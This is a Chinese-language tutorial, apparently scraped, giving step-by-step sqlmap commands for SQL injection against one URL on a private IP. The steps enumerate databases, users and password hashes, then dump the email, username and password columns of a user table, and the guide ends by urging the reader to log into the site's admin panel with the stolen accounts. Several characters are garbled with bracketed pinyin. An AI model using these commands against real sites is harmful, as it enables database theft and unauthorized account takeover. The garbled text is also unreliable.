一、檢測(cè)注入點(diǎn)是否可用
#sqlmap -u "http://192.168.1.150/products.asp?id=134"
參數(shù):
-u:指定注入點(diǎn)url
其中圖一有若干詢問語句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動(dòng)輸入,只需添加一個(gè)參數(shù)即可,命令如下:
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴庫
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --dbs
參數(shù):
--dbs:dbs前面有兩條杠,請(qǐng)看清楚。
三、顯示web當(dāng)前使用的數(shù)據(jù)庫
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-db
四、顯示web數(shù)據(jù)庫當(dāng)前賬戶
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-user
五、列出sqlserver所有用戶
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --users
六、顯示數(shù)據(jù)庫賬戶與密碼(一般是加密的)
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --passwords
七、列出數(shù)據(jù)庫中的表
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
參數(shù):
-D:指定數(shù)據(jù)庫名稱
--tables:列出表
八、列出表中字段
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
參數(shù):
-D:指定數(shù)據(jù)庫名稱
-T:指定要列出字段的表
--columns:指定列出字段
九、暴字段內(nèi)容
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
參數(shù):
-C :指定要暴的字段
--dump:將結(jié)果導(dǎo)出
如果字段內(nèi)容太多,需要花費(fèi)很多時(shí)間??梢灾付▽?dǎo)出特定范圍的字段內(nèi)容,命令如下:
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
參數(shù):
--start:指定開始的行
--stop:指定結(jié)束的行
此條命令的含義為:導(dǎo)出數(shù)據(jù)庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容。
十、驗(yàn)證結(jié)果
根據(jù)上述步驟爆出的賬號(hào),登錄網(wǎng)站后臺(tái),然后就自由發(fā)揮了。